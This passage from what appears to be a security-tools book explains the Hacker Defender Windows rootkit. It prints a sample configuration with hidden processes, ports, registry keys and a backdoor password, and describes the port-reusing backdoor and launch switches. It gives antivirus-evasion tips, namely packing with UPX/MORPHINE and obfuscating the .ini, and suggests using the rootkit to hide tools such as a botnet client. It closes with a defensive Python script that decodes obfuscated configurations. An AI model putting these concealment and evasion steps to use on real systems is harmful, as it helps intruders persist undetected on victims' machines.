Rootkit technology is not really new; it began back in the Unix world as a group of Trojan applications that replaced the standard ones to hide files and provide higher access. While detection techniques evolved using integrity checking and other means, the rootkit also evolved by moving from user space to the more powerful kernel space, usually as kernel modules, and using different techniques to stay hidden. Contrary to the backdoor, which offers more functionality to the remote administrator, the role of the rootkit is mainly to hide itself and other applications. Usually the race between the detector and the rootkit is won by the first one to be installed on the system. Therefore it is important to be ready and plan ahead before putting any system into production. Trying to detect and remove a rootkit after it is installed, if nothing was done previously, could end up being a very difficult task—the best time-saving solution might be to format and re-install the whole system.
There are several rootkits available. We'll peer into the best ones for each platform and note their strengths and weaknesses. If you want more information on rootkit technology and more specific "under the hood" documentation of how they work and interact with the various operating systems they can be used against, a great resource is the web site http://www.rootkit.com. In addition, the book RootKits: Subverting the Windows Kernel by Jamie Butler and Greg Hoglund (Addison-Wesley) is a great resource.
Hacker Defender (hxdef) is an open source Windows NT/2000/XP rootkit. It is not just a proof of concept (like most rootkits); it is a full-fledged rootkit with multiple features. hxdef is able to hide its process, port, registry entries, and files by hooking multiple Windows APIs. Since it is based on hooking (replacing valid system calls or DLLs with Trojaned ones), it can bypass multiple detection systems, except for some such as IceSword (see Windows Rootkit Detectors), BlackLight, or Kaspersky. Note that other antivirus apps might also detect hxdef.
The following piece of code is a configuration file (the .ini file) for Hacker Defender 1.00. You must modify this file to fit your needs.
Always be careful when naming the file(s) that you hide. Hacker Defender hides everything that matches the given key, so be sure not to choose a generic name such as System32; rather, choose an uncommon name. Hiding by using the name of normal Windows drivers, keys, values, or programs might result in system instability.
[Hidden Table]
# table to be hidden
hxdef*
rcmd.exe
[Root Processes]
# Process to be hidden
hxdef*
rcmd.exe
[Hidden Services]
# Service name to be hidden
HackerDefender*
[Hidden RegKeys]
# Registry keys to be hidden
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100
[Hidden RegValues]
# Registry values to be hidden
[Startup Run]
# software to start when the rootkit is loaded
[Free Space]
# fake free space to be added to the hard drive, is useful if you use the host as a file server
[Hidden Ports]
# port to be hidden
TCP: 8080, 1234
UDP: 12,13,14,15
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdef.exe
FileMappingName=_-=[Hacker Defender]=-_
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
By default, Hacker Defender hides itself. Even though it does provide a basic backdoor (cmd.exe), it is usually better to use the stealth capacity of Hacker Defender to hide more appropriate tools for your personal tasks, whether it is an exploitation agent from Core Impact (see Running an Exploit and Core Impact Overview), a Python shell, a botnet client, or a user-monitoring system. Hacker Defender hides stuff (e.g., process, port, registry, service) and does it well. If you're trying to use Hacker Defender for anything more, it's best to rely on a different tool.
By default, most files provided with Hacker Defender are detected by anti-virus software. The best way to circumvent this is to pack the compiled binary with UPX and MORPHINE and to modify the .ini file by adding extra characters such as |, <, >, :, \, /, and ", which are ignored on all lines except the following:
[Startup Run]
# software to be started
[Free Space]
# free space to add to the drive
[Hidden Ports]
# list of ports to be hidden
A modified configuration entry might look like this:
"[:\:R:o:o\:t: :P:r>:o:c<:e:s:s:e<:s:>] h<x>d<e>:f<* <\r\c:\m\d.\e\x\e
Such a transformation makes it harder for software to do string matching on raw devices. This protects these files from most anti-virus software, because literal signature matches against the file contents no longer work.
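The stripping rule described above is deterministic, so a responder who recovers an obfuscated hxdef .ini from disk can normalize it and see exactly what it was configured to hide. The following helper is an added example (not from the book or the hxdef project); its sample .ini is constructed from the entries shown above, with two extra sections to exercise the verbatim rule:

```python
import fnmatch

# Characters that hxdef ignores when reading its .ini (per the text above).
IGNORED = set('|<>:\\/"')
# Sections whose items keep those characters verbatim (paths, sizes, port lists).
VERBATIM_SECTIONS = {"startup run", "free space", "hidden ports"}

# Constructed sample: the obfuscated [Root Processes] block from above plus two
# more sections; this is not a capture from a real system.
SAMPLE_INI = r'''
"[:\:R:o:o\:t: :P:r>:o:c<:e:s:s:e<:s:>]
h<x>d<e>:f<*          # process names to hide
<\r\c:\m\d.\e\x\e
[H:i:d:d:e:n P:o:r:t:s]
TCP: 8080, 1234
[Se|tt|ings]
Pass"word=hxdef-rulez
'''

def normalize_hxdef_ini(text):
    """Undo the obfuscation and return {section_name_lowercase: [items]}."""
    sections = {}
    current = None
    for raw in text.splitlines():
        raw = raw.split("#", 1)[0]                      # drop comments
        stripped = "".join(c for c in raw if c not in IGNORED).strip()
        # Section headers are obfuscated too, so recognise them after stripping.
        if stripped.startswith("[") and stripped.endswith("]"):
            current = stripped[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None:
            continue
        item = raw.strip() if current in VERBATIM_SECTIONS else stripped
        if item:
            sections[current].append(item)
    return sections

def hidden_matches(sections, section, names):
    """Names (files, processes, services) that the patterns in `section` would hide."""
    patterns = sections.get(section, [])
    return [n for n in names
            if any(fnmatch.fnmatchcase(n.lower(), p.lower()) for p in patterns)]

if __name__ == "__main__":
    cfg = normalize_hxdef_ini(SAMPLE_INI)
    for name, items in cfg.items():
        print(f"[{name}] {items}")
    print(hidden_matches(cfg, "root processes", ["hxdef100.exe", "RCMD.EXE", "explorer.exe"]))
```

Feeding a process list, directory listing, or service list into hidden_matches against the corresponding section shows which entries a rootkit-free view of the host (e.g., from an offline boot) should contain but the running system hides.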
Hacker Defender offers a small utility to connect to its rootkit from a remote system. The cool part is its ability to use ports already opened by other applications. Since the rootkit can watch any incoming communication, the backdoor integrated in the system uses a 256-byte key to connect to the rootkit over a port already opened by another application, such as IIS. So any open port receiving over 256 bytes on the target system could be used to communicate with the backdoor (this includes HTTP, SMTP, Telnet, SMB, and RPC). The backdoor provided in Hacker Defender is a simple command prompt. While it might not be as powerful as other backdoors, it provides the basic functions to install and run a full-fledged remote administration application.
Hacker Defender can be started from the command prompt using the provided executable. This executable installs and runs the service module necessary for the hiding functionality. Table 12-1 lists the switches available when starting Hacker Defender.
Table 12-1. Switches available when launching Hacker Defender
| Switch | Description |
|---|---|
| -:installonly | Installs only the service and does not run. |
| -:refresh | Updates the settings from the .ini file. |
| -:noservice | Does not install services and runs normally. |
| -:uninstall | Removes hxdef from memory and kills all running backdoor connections; stopping the hxdef service does the same. |
An example is:
>hxdef100.exe -:refresh
If you did not change the default settings, you can run the shell and stop the service with:
>net stop HackerDefender100
If you did change the default settings, you must remember the name of the service you set or use tools such as IceSword (http://pjf.blogone.net) to find the running service (see Windows Rootkit Detectors). Otherwise, you will be trying to remove something that you cannot really see.